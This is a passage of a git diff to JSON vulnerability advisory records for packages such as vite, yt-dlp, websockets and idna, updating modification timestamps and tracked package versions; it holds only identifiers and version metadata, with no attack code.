"strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2024-52011.json b/advisories/BREW-vite-CVE-2024-52011.json index c8c9d9d8fae..10c66e5a81a 100644 --- a/advisories/BREW-vite-CVE-2024-52011.json +++ b/advisories/BREW-vite-CVE-2024-52011.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2024-52011", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-c27g-q93r-2cwf", "CVE-2024-52011" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-24010.json b/advisories/BREW-vite-CVE-2025-24010.json index f2c06906a6d..3aab92e7c93 100644 --- a/advisories/BREW-vite-CVE-2025-24010.json +++ b/advisories/BREW-vite-CVE-2025-24010.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-24010", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-vg6x-rcgg-rjx6", "CVE-2025-24010" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-30208.json b/advisories/BREW-vite-CVE-2025-30208.json index b717205e086..84e986767ee 100644 --- a/advisories/BREW-vite-CVE-2025-30208.json +++ b/advisories/BREW-vite-CVE-2025-30208.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-30208", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-x574-m823-4x7w", "CVE-2025-30208" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-31125.json b/advisories/BREW-vite-CVE-2025-31125.json index 0ba9c5b1c6d..e50218a75a8 100644 --- a/advisories/BREW-vite-CVE-2025-31125.json +++ b/advisories/BREW-vite-CVE-2025-31125.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-31125", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-4r4m-qw57-chr8", "CVE-2025-31125" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-31486.json b/advisories/BREW-vite-CVE-2025-31486.json index 867efb0c0f0..19d28d8ebf4 100644 --- a/advisories/BREW-vite-CVE-2025-31486.json +++ b/advisories/BREW-vite-CVE-2025-31486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-31486", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-xcj6-pq6g-qj4x", "CVE-2025-31486" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-32395.json b/advisories/BREW-vite-CVE-2025-32395.json index c187bb526bb..1582174c612 100644 --- a/advisories/BREW-vite-CVE-2025-32395.json +++ b/advisories/BREW-vite-CVE-2025-32395.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-32395", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-356w-63v5-8wf4", "CVE-2025-32395" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-46565.json b/advisories/BREW-vite-CVE-2025-46565.json index e4277aa13bd..b1f69d9e228 100644 --- a/advisories/BREW-vite-CVE-2025-46565.json +++ b/advisories/BREW-vite-CVE-2025-46565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-46565", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-859w-5945-r5v3", "CVE-2025-46565" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-58751.json b/advisories/BREW-vite-CVE-2025-58751.json index 5c1c5eb6a81..6d235049d0b 100644 --- a/advisories/BREW-vite-CVE-2025-58751.json +++ b/advisories/BREW-vite-CVE-2025-58751.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-58751", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-g4jq-h2w9-997c", "CVE-2025-58751" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-58752.json b/advisories/BREW-vite-CVE-2025-58752.json index 78f14c7597f..5b2d25cadc7 100644 --- a/advisories/BREW-vite-CVE-2025-58752.json +++ b/advisories/BREW-vite-CVE-2025-58752.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-58752", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-jqfw-vq24-v9c3", "CVE-2025-58752" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2025-62522.json b/advisories/BREW-vite-CVE-2025-62522.json index bfb08af89e8..6c3fff95f0d 100644 --- a/advisories/BREW-vite-CVE-2025-62522.json +++ b/advisories/BREW-vite-CVE-2025-62522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2025-62522", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-93m4-6634-74q7", "CVE-2025-62522" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2026-39363.json b/advisories/BREW-vite-CVE-2026-39363.json index d8cde0dfbc2..4f4dd1c1910 100644 --- a/advisories/BREW-vite-CVE-2026-39363.json +++ b/advisories/BREW-vite-CVE-2026-39363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2026-39363", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-p9ff-h696-f583", "CVE-2026-39363" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2026-39364.json b/advisories/BREW-vite-CVE-2026-39364.json index 041bc4d8950..870dc104f69 100644 --- a/advisories/BREW-vite-CVE-2026-39364.json +++ b/advisories/BREW-vite-CVE-2026-39364.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2026-39364", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-v2wj-q39q-566r", "CVE-2026-39364" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2026-39365.json b/advisories/BREW-vite-CVE-2026-39365.json index 198a384699d..e6497ed3cbb 100644 --- a/advisories/BREW-vite-CVE-2026-39365.json +++ b/advisories/BREW-vite-CVE-2026-39365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2026-39365", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-4w7w-66w2-5vf9", "CVE-2026-39365" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2026-53571.json b/advisories/BREW-vite-CVE-2026-53571.json index 075992eb0ee..3f68430531f 100644 --- a/advisories/BREW-vite-CVE-2026-53571.json +++ b/advisories/BREW-vite-CVE-2026-53571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2026-53571", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-fx2h-pf6j-xcff", "CVE-2026-53571" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vite-CVE-2026-53632.json b/advisories/BREW-vite-CVE-2026-53632.json index 03f57de98ad..2b309cb7841 100644 --- a/advisories/BREW-vite-CVE-2026-53632.json +++ b/advisories/BREW-vite-CVE-2026-53632.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vite-CVE-2026-53632", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-13T17:48:54Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-v6wh-96g9-6wx3", "CVE-2026-53632" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vite", - "subject_version": "8.2.1", - "key": "pkg:npm/vite@8.2.1" + "subject_version": "8.2.2", + "key": "pkg:npm/vite@8.2.2" } ] }, diff --git a/advisories/BREW-vnu-CVE-2025-15104.json b/advisories/BREW-vnu-CVE-2025-15104.json index da062b34980..27ff777b7e0 100644 --- a/advisories/BREW-vnu-CVE-2025-15104.json +++ b/advisories/BREW-vnu-CVE-2025-15104.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-vnu-CVE-2025-15104", "published": "2026-08-13T17:48:54Z", - "modified": "2026-08-20T09:51:44Z", + "modified": "2026-08-22T09:46:05Z", "upstream": [ "GHSA-fccg-7w3p-w66f", "CVE-2025-15104" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "vnu-jar", - "subject_version": "26.8.19", - "key": "pkg:npm/vnu-jar@26.8.19" + "subject_version": "26.8.20", + "key": "pkg:npm/vnu-jar@26.8.20" } ] }, diff --git a/advisories/BREW-yt-dlp-CVE-2018-1000518.json b/advisories/BREW-yt-dlp-CVE-2018-1000518.json index 952eccc9f17..c1e0f5342d0 100644 --- a/advisories/BREW-yt-dlp-CVE-2018-1000518.json +++ b/advisories/BREW-yt-dlp-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2018-1000518", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "5.0", "resource": "websockets", - "resource_purl": "pkg:pypi/websockets@16.0" + "resource_purl": "pkg:pypi/websockets@17.0.1" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", + "subject_version": "17.0.1", + "key": "pkg:pypi/websockets@17.0.1", "resource": "websockets" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", + "subject_version": "17.0.1", + "key": "pkg:pypi/websockets@17.0.1", "resource": "websockets" } ] diff --git a/advisories/BREW-yt-dlp-CVE-2021-33880.json b/advisories/BREW-yt-dlp-CVE-2021-33880.json index 6a8791423bb..0f82504d114 100644 --- a/advisories/BREW-yt-dlp-CVE-2021-33880.json +++ b/advisories/BREW-yt-dlp-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2021-33880", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "9.1", "resource": "websockets", - "resource_purl": "pkg:pypi/websockets@16.0" + "resource_purl": "pkg:pypi/websockets@17.0.1" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", + "subject_version": "17.0.1", + "key": "pkg:pypi/websockets@17.0.1", "resource": "websockets" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", + "subject_version": "17.0.1", + "key": "pkg:pypi/websockets@17.0.1", "resource": "websockets" } ] diff --git a/advisories/BREW-yt-dlp-CVE-2023-35934.json b/advisories/BREW-yt-dlp-CVE-2023-35934.json index 414cc2bad36..3747836ab88 100644 --- a/advisories/BREW-yt-dlp-CVE-2023-35934.json +++ b/advisories/BREW-yt-dlp-CVE-2023-35934.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2023-35934", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2023-35934", "GHSA-v8mc-9377-rwjj", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2023-40581.json b/advisories/BREW-yt-dlp-CVE-2023-40581.json index 7e801c7209d..1bad1d0da65 100644 --- a/advisories/BREW-yt-dlp-CVE-2023-40581.json +++ b/advisories/BREW-yt-dlp-CVE-2023-40581.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2023-40581", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2023-40581", "GHSA-42h4-v29r-42qg", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" } ] }, diff --git a/advisories/BREW-yt-dlp-CVE-2023-46121.json b/advisories/BREW-yt-dlp-CVE-2023-46121.json index 8412a9e056a..5b6592631f5 100644 --- a/advisories/BREW-yt-dlp-CVE-2023-46121.json +++ b/advisories/BREW-yt-dlp-CVE-2023-46121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2023-46121", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2023-46121", "GHSA-3ch3-jhc6-5r8x", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2024-22423.json b/advisories/BREW-yt-dlp-CVE-2024-22423.json index cf899c4dff1..b7d97547507 100644 --- a/advisories/BREW-yt-dlp-CVE-2024-22423.json +++ b/advisories/BREW-yt-dlp-CVE-2024-22423.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2024-22423", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2024-22423", "GHSA-hjq6-52gw-2g7p", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" } ] }, diff --git a/advisories/BREW-yt-dlp-CVE-2024-3651.json b/advisories/BREW-yt-dlp-CVE-2024-3651.json index 0cf4cd2b1cc..583e463460a 100644 --- a/advisories/BREW-yt-dlp-CVE-2024-3651.json +++ b/advisories/BREW-yt-dlp-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2024-3651", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-yt-dlp-CVE-2024-38519.json b/advisories/BREW-yt-dlp-CVE-2024-38519.json index b64f932471b..b8c3ddfe3e2 100644 --- a/advisories/BREW-yt-dlp-CVE-2024-38519.json +++ b/advisories/BREW-yt-dlp-CVE-2024-38519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2024-38519", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2024-38519", "GHSA-79w7-vh3h-8g4j", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2026-26331.json b/advisories/BREW-yt-dlp-CVE-2026-26331.json index d49008b78f1..81f1300a818 100644 --- a/advisories/BREW-yt-dlp-CVE-2026-26331.json +++ b/advisories/BREW-yt-dlp-CVE-2026-26331.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2026-26331", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2026-26331", "GHSA-g3gw-q23r-pgqm", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "upstream:pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "upstream:pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", diff --git a/advisories/BREW-yt-dlp-CVE-2026-45409.json b/advisories/BREW-yt-dlp-CVE-2026-45409.json index e029c671b1b..bbc2157e079 100644 --- a/advisories/BREW-yt-dlp-CVE-2026-45409.json +++ b/advisories/BREW-yt-dlp-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2026-45409", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-yt-dlp-CVE-2026-50019.json b/advisories/BREW-yt-dlp-CVE-2026-50019.json index 0941081061d..5a5b401694a 100644 --- a/advisories/BREW-yt-dlp-CVE-2026-50019.json +++ b/advisories/BREW-yt-dlp-CVE-2026-50019.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-yt-dlp-CVE-2026-50019", "published": "2026-08-13T17:55:05Z", - "modified": "2026-08-13T17:55:05Z", + "modified": "2026-08-22T09:53:02Z", "upstream": [ "CVE-2026-50019", "GHSA-f7j3-774f-rfhj", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "https://github.com/yt-dlp/yt-dlp" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": "2026.7.4", - "key": "pkg:pypi/yt-dlp@2026.7.4" + "subject_version": "2026.8.19", + "key": "pkg:pypi/yt-dlp@2026.8.19" }, { "strategy": "distro", @@ -71,15 +71,15 @@ "strategy": "distro", "ecosystem": "GIT", "name": "https://github.com/yt-dlp/yt-dlp", - "subject_version": "2026.7.4", + "subject_version": "2026.8.19", "key": "upstream:https://github.com/yt-dlp/yt-dlp" }, { "strategy": "distro", "ecosystem": "PyPI", "name": "yt-dlp", - "subject_version": 